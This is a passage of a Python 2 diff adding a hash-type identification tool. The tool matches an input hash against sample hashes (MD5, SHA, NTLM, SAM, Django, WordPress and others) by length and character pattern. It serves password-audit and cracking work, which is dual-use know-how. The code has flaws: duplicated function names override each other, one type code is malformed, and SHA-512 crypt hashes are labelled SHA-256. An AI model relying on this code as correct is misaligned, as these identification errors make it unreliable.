"109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); 